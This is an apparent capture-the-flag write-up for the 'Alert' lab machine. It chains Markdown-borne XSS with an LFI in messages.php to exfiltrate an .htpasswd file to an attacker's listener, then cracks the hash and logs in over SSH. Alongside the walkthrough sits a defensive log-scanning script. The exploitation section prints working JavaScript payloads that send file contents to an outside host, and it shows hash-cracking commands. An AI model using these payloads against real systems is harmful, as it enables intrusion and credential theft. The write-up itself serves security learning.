Alert
Writeup of Alert machine

Reconnaissance
Nmap Scanning Process
These steps help map the target's exposed services and assess its attack surface. The picture shows the machine has two open ports: 80 and 22.

Port 80: This port is commonly used for HTTP (Hypertext Transfer Protocol) traffic, which forms the foundation of the web. It is the default port for web servers to accept requests from web browsers over an unencrypted connection.
Port 22: Known as the default port for SSH (Secure Shell), it allows secure management and data transfer over unsecured networks. SSH is commonly used for remote server management and secure file transfers.
Subdomain Discovery Using Fuzzing Method
ffuf -c -u http://alert.htb -H "Host: FUZZ.alert.htb" -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt -fc 301

http://statistics.alert.htb -> Asked Username & Password
http://alert.htb -> Output below

Identifying Bugs
Through analysis, it is clear that the page accepts a Markdown (.md) file as input and renders it. After some tests in Burp Suite, I suspected an XSS injection and decided to try it.
Exploitation
Our payload will look like this 👏
Hosting a Malicious Server
python3 -m http.server 8888
Malicious Markdown File (MD File)
<script>
// Read a server-side file through the vulnerable 'file' parameter of messages.php
fetch("http://alert.htb/messages.php?file=filepath")
.then(response => response.text())
.then(data => {
  // Send the file contents to the Python server started above
  fetch("http://10.10.xx.xx:8888/?file_content=" + encodeURIComponent(data));
});
</script>
// 10.10.xx.xx => replace with your local IP
When this file was uploaded, the application's LFI vulnerability let me read private files and send their contents to my Python server; the contents of the requested 'filepath' arrived on the listener.
To get the user's password, I read the .htpasswd file of the statistics subdomain (the one that initially asked for a username and password) through the same vulnerability.
<script>
fetch("http://alert.htb/messages.php?file=../../../../../../../var/www/statistics.alert.htb/.htpasswd")
.then(response => response.text())
.then(data => {
fetch("http://10.10.21.21:8888/?file_content=" + encodeURIComponent(data));
});
</script>
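As an added defensive example (not part of the original writeup), the following Python script scans Apache access-log lines for the traversal pattern used above in the `file` parameter of messages.php: it decodes the parameter, normalises the path and flags any request that escapes the intended directory. The log lines, IP addresses and filenames are constructed for illustration.

```python
"""Flag LFI/path-traversal attempts against messages.php in access logs."""
import re
from posixpath import normpath
from urllib.parse import parse_qs, unquote, urlsplit

# Constructed sample lines in Apache combined-log format (not real server logs).
SAMPLE_LOG = """\
10.10.14.5 - - [01/Jan/2025:10:00:00 +0000] "GET /messages.php?file=2024-03-10_15-48-34.txt HTTP/1.1" 200 512 "-" "Mozilla/5.0"
10.10.14.5 - - [01/Jan/2025:10:00:07 +0000] "GET /messages.php?file=../../../../../../../var/www/statistics.alert.htb/.htpasswd HTTP/1.1" 200 92 "-" "Mozilla/5.0"
10.10.14.5 - - [01/Jan/2025:10:00:09 +0000] "GET /messages.php?file=..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1" 200 1801 "-" "Mozilla/5.0"
10.10.14.5 - - [01/Jan/2025:10:00:12 +0000] "GET /index.php?page=contact HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<url>\S+) [^"]*" (?P<status>\d{3})'
)


def is_traversal(value: str) -> bool:
    """True if a decoded `file` value leaves its base directory.
    Double-decoding catches %252e%252e-style encoding; normpath collapses
    harmless forms such as a/../b so only a leading '..' or an absolute
    path can remain."""
    decoded = unquote(unquote(value)).replace("\\", "/")
    cleaned = normpath(decoded)
    return cleaned.startswith("/") or cleaned == ".." or cleaned.startswith("../")


def find_lfi_attempts(log_text: str) -> list[dict]:
    """Return one finding per request to messages.php whose `file`
    query parameter is a traversal attempt."""
    findings = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        parts = urlsplit(m["url"])
        if not parts.path.endswith("/messages.php"):
            continue
        for value in parse_qs(parts.query, keep_blank_values=True).get("file", []):
            if is_traversal(value):
                findings.append({"ip": m["ip"], "ts": m["ts"],
                                 "file": unquote(value), "status": m["status"]})
    return findings


if __name__ == "__main__":
    for f in find_lfi_attempts(SAMPLE_LOG):
        print(f"{f['ts']} {f['ip']} status={f['status']} file={f['file']}")
```

A status of 200 on a flagged request is the strongest signal, since it means the include succeeded rather than being rejected.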


User Flag

So, the URL-encoded response containing the user's password hash is:
%3Cpre%3Ealbert%3A%24apr1%24bMoRBJOg%24igG8WBtQ1xYDTQdLjSWZQ%2F%0A%3C%2Fpre%3E%0A
Paste it into CyberChef and decode it with the URL Decode recipe. Result:
albert:$apr1$bMoRBJOg$igG8WBtQ1xYDTQdLjSWZQ/
username -> albert
password hash -> $apr1$bMoRBJOg$igG8WBtQ1xYDTQdLjSWZQ/
To crack the password, we first need to identify the hash type. Using the hashcat cheatsheet, it matches the following mode:
1600 -> Apache $apr1$ MD5, md5apr1, MD5 (APR)
hashcat -m 1600 -a 0 hash.txt /usr/share/wordlists/rockyou.txt
Since hashcat needs a fairly large amount of memory, you can use John the Ripper instead.
john --wordlist=/usr/share/wordlists/rockyou.txt --format=md5crypt-long hash.txt

BOOM!!!
Log in as the user over SSH and read the user.txt file.
ssh albert@10.10.11.44
Root Flag
Privilege Escalation

Open port: 8080
Testing the open port locally through an SSH tunnel:
ssh -L 8080:127.0.0.1:8080 albert@alert.htb

The most interesting part is that the /opt directory is accessible with root permissions, which gives a great opportunity to upload our shell there and execute it from the browser.
The End!!! 🔚
Thank you!!! 🙏